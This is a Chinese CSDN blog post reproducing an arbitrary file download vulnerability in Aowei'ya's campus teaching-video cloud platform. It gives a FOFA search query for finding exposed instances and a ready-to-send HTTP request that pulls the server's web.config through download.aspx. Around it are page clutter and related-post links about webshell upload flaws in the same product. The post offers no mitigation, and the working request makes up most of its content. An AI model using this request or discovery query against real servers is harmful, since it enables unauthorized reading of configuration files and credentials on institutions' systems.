【漏洞复现】奥威亚视屏云平台任意文件下载漏洞

最新推荐文章于 2024-07-25 17:11:44 发布
最新推荐文章于 2024-07-25 17:11:44 发布
阅读量537 收藏 8
点赞数 7
分类专栏: 漏洞复现 文章标签: 安全 web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45530380/article/details/135244576
版权

漏洞描述

广州市奥威亚电子科技有限公司校园视频应用云平台存在任意文件下载漏洞,攻击者可利用该漏洞下载服务器上任意文件,获取敏感信息

资产测绘

FOFA:app="AVA-教学视频应用云平台"

漏洞复现


GET /download.aspx?file=/web.config HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: ASP.NET_SessionId=15z0s55cmvsttopkzdyt1ud3
Upgrade-Insecure-Requests: 1

新疆东坡肉
关注
  • 7
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
奥威亚视频云平台VideoCover.aspx 接口任意文件上传漏洞复现 [附POC]
薛定谔嘚喵博客
12-12 260
为了满足高校培养人才和教学管理的需求,顺应时代的发展,奥威亚围绕大数据下的学习和教育,推出升级版的高校视频应用云平台奥威亚视频云平台VideoCover.aspx接口存在任意文件上传漏洞
漏洞复现奥威亚视屏云平台-VideoCover-任意文件上传
知黑而守白
12-14 200
奥威亚教学视频应用服务平台是广州市奥威亚电子科技有限公司专门为满足当今教育领域的视频资源建设需求和用户的实际需求,开发的一款具有实用性、多功能性和特色鲜明的平台。该平台能够适应时代发展的需要,满足学校的各类教学需求。此内容仅供技术交流与学习,请勿用于未经授权的场景。请遵循相关法律与道德规范。任何因使用本文所述技术而引发的法律责任,与本文作者及发布平台无关。如有内容争议或侵权,请及时私信我们!该产品存在任意文件上传漏洞,通过此漏洞攻击者可上传webshell木马,远程控制服务器。
奥威亚教学视频应用云平台 VideoCover任意文件上传漏洞复现
0xSec
12-10 1091
奥威亚教学视频应用云平台 VideoCover.aspx接口处存在任意文件上传漏洞,未经身份验证的攻击者可利用上传后门文件达到获取服务器权限效果。
漏洞复现-某教育视频云平台前台某接口文件上传漏洞(附漏洞检测脚本)
jjjj1029056414的博客
12-07 605
复现某教育视频云平台前台某接口文件上传漏洞,附带自己写的poc脚本
复现奥威亚视屏云平台文件读取漏洞_27
fushuang333的博客
01-24 599
复现奥威亚视屏云平台文件读取漏洞,通过提交专门设计的输入,攻击者就可以在被访问的文件系统中读取或写入任意内容
奥威亚视屏云平台VideoCover任意文件上传
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
12-14 409
采用混合云架构,构建支撑新型教研、教学活动的互动云。它能有效确保互动便捷性、流畅性与安全性。根据教研、教学的需求,它支持互动点数的灵活扩展,实现大规模同步互动的负载均衡,保障区域大规模互动的并发应用。专为教学定制的互动云系统,更适用于专递课堂、联盟学校及网络教研等大规模互动教学需求。
奥威亚-分布式班班录播解决方案(电子云镜).docx
09-29
"奥威亚"作为领先的教育信息化解决方案提供商,针对当前教学视频资源不足的问题,提出了分布式班班录播解决方案,旨在打造符合国家标准的录播教室,推动“人人皆学、处处能学、时时可学”的教育目标。 一、项目背景...
奥威亚AVA录播招标参数课件资料.doc
04-10
奥威亚AVA录播招标参数课件资料 以下是根据给定的文件信息,生成的相关知识点: 1. 录播主机技术指标: * 纯嵌入一体式内置存储架构 * 支持不少于 4 个 3G-SDI、2 个 HDMI、1 个 VGA、2 个 YPbPr、2 个 S-video...
广州奥威亚播放软件
10-27
广州奥威亚播放软件能播放摄像头拍摄的视频,360度全方位播放
奥威亚AVA高清录播方案书 2.pdf
11-13
"奥威亚AVA高清录播方案书 ...7. 方案介绍:该方案旨在解决学校教学中存在的问题,提供了一种基于云架构设计的视频服务聚合技术,实现了资源均衡共享,并提供了多种功能,包括录播教室、观摩室和教学视频应用云平台等。
奥威亚AVA录播招标参数.pdf
10-18
奥威亚AVA录播招标参数.pdf 文件提供了详细的技术要求和参数规范,对于奥威亚AVA录播设备的供应商和生产商具有重要的参考价值。以下是从文件中提取的关键知识点: 谈判供应商须提供的证明材料 * 导播软件PAD 版...
极速下载!青苹果系统Win7旗舰版:稳定安全
lihuiyun184291的博客
07-25 426
今天系统之家小编给大家带来了青苹果系统Win7旗舰版镜像,该版本系统离线制作而成,安全无病毒,还升级了防火墙功能,大家安装后时刻都能放心操作。同时,它是在保持原有的功能并适度优化,保留下来的功能轻松满足大家的使用需求,系统稳定性也很高,运作顺畅不卡顿。
微软蓝屏事件引发对构建更加稳固和安全的网络环境的思考
lupai的博客
07-24 496
综上所述,构建更加稳固和安全的网络环境需要政府、企业和用户共同努力,从政策、技术、用户行为等多个方面入手,形成全方位、多层次的网络安全防护体系。构建更加稳固和安全的网络环境是一个系统工程,需要从多个方面入手,包括政策、技术、用户行为等多个层面。建立完善的应急响应机制,制定应急预案和演练计划,提高应对网络攻击和突发事件的能力。鼓励和支持网络安全技术的研发和创新,推动新技术在网络安全领域的应用和推广。加强对用户的网络安全教育,提高用户的网络安全意识和防范能力。
2024安全大模型技术与市场研究报告
cybtec的博客
07-25 463
2024安全大模型技术与市场研究报告
网络战时代的国家安全:策略、技术和国际合作
2301_79955948的博客
07-24 1166
网络战时代的国家安全涉及到策略、技术和国际合作等多个方面。
保障企业数据主权:安全可控的爬虫工具与管理平台
最新发布
zhou6343178的博客
07-25 694
在数据驱动的时代,企业对数据的需求日益增长,但如何在保障数据主权的前提下高效采集数据?本文深入探讨了选择安全可控爬虫工具与管理平台的重要性,分析了关键特性,并提出实用建议,助力企业维护数据安全,实现数据价值最大化。
HDShredder 7 企业版案例分享: 依照国际权威标准,安全清除企业数据
sanyuan7783的博客
07-24 1189
符合国际权威标准软件操作符合多种主流国际权威标准,包括 DoD 5200, BSI, VSITR, NCSC, NIST 及 GOST,支持擦除单个分区和区域,并可自由定制擦除模式。对于“Clear”清除级别,软件操作符合 ISO 27001, DIN 66399 以及 NIST SP 800-88R1要求。对于“Purge”级别,则使用 SecureErase 功能。安全擦除证书软件生成准确的安全清除证书,包括时间戳、序列号、以及清除过程的所有细节信息。远程擦除 - 使用 NetDisk 技术。
数据库安全:MySQL安全配置,MySQL安全基线检查加固
wangyuxiang946的博客
07-23 2327
MySQL基线检查,基线配置,安全加固
科普文:Linux系统安全加固指南
为无为,事无事,味无味。
07-25 892
本指南仅关注安全性和隐私性,而不关注性能,可用性或其他内容。列出的所有命令都将需要root特权。以“$”符号开头的单词表示一个变量,不同终端之间可能会有所不同。选择一个好的Linux发行版有很多因素。避免分发冻结程序包,因为它们在安全更新中通常很落后不使用与Systemd机制的发行版。Systemd包含许多不必要的攻击面;它尝试做的事情远远超出了必要,并且超出了初始化系统应做的事情。使用musl作为默认的C库。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值